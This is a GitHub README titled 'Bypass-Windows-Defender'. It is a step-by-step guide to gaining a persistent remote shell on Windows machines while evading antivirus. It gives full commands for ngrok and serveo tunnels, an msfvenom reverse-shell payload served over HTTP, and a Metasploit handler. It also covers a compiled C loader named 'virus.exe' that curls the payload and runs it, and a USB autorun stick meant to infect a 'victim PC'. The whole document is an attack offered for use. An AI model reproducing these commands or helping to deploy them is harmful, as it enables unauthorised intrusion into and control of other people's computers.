Skip to content

Latest commit

 

History

History
148 lines (123 loc) · 4.06 KB

README.md

File metadata and controls

148 lines (123 loc) · 4.06 KB

Bypass-Windows-Defender

Bypass Windows Defender with a persistent staged reverse shells

developed by L0PA

Bypass Step's:

  • Create a TCP Tunnel: Set up a TCP tunnel using Ngrok to expose the port for the payload.
  • Generate Payload: Use msfvenom to create the payload in .bin format.
  • Start Python Server: Launch a Python HTTP server in the same directory where the payload is located.
  • Expose Server Online: Use Serveo to make the server accessible online.
  • Set up Listener: Use msfconsole to listen on the specified TCP port.
  • Develop C Code: Write the C code to fetch and execute the payload.
  • Compile and Run: Compile the C code.
  • Create a USB with autorun

Install all requirements on debian

  • Install Ngrok
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
sudo mv ngrok /usr/local/bin/
  • install metasploit framework
curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/scripts/ubuntu_install.sh > ubuntu_install.sh
chmod +x ubuntu_install.sh
./ubuntu_install.sh
  • install gcc
sudo apt install gcc-mingw-w64-x86-64

Install all requirements on Arch Linux

  • Install Ngrok
git clone https://aur.archlinux.org/ngrok-bin.git
cd ngrok-bin
makepkg -si
  • metasploit framework
sudo pacman -S metasploit
  • install gcc
sudo pacman -S mingw-w64-gcc

Tutorial for bypass Windows Defender

  • Create the tcp tunnel on the port 4444
    sudo ngrok tcp 4444
    
  • Copy the IP and the PORT of the server
     - IP: 4.tcp.eu.ngrok.io
     - PORT: 15819
    

  • Create the .bin payload using msfvenom

      msfvenom -p windows/x64/shell_reverse_tcp LHOST=4.tcp.eu.ngrok.io LPORT=15819 -f raw -o payload.bin
    
  • Launch a Python HTTP server in the same directory where the payload is located

      python -m http.server 8090
    
  • Create the serveo key and expose python server using a serveo tunnel

     ssh-keygen -t rsa -b 4096 -f ~/.ssh/serveo_key
     ssh -i ~/.ssh/serveo_key -R yourServer:80:localhost:8090 serveo.net
    
  • Create the main.c file and modify the "command" variable with your server

   char *command = "curl https://yourServer.serveo.net/payload.bin";

  • Setting up msfconsole
   msfconsole
   use multi/handler
   set payload windows/x64/shell_reverse_tcp
   set LHOST <LOCAL IP>
   set LPORT 4444
   exploit

  • Compile the main.c file for Windows

    • For Windows
    gcc main.c -o virus -mwindows
    
    • For Linux
    x86_64-w64-mingw32-gcc -o virus.exe main.c -mwindows
    

    ⚠️ don't forget the -mwindows parameter

💾 AutoRun USB

Now, let's create a USB stick that will automatically run the file (autorun)

  • Install the software "USB AutoRun Creator" from this link: "bit.ly/USB-AutoRun-Creator"
  • Follow the installation and open the software

  • In the first field enter the path of the previously compiled .exe file, in the second field select your USB drive
  • The Icon and Label fields are optional
  • Click on "Create"

😈 Now, remove and reinsert the USB stick

⚠️ The files in the USB stick with autorun will never have to be updated, to create the payload again, you will have to start a new TCP tunnel and create a new payload with msfvenom using the same name specified the first time, so that the new payload replaces the old one . Then just start the python server, and then the tunnel with serveo and connect the USB to the victim PC. Happy Hacking ;)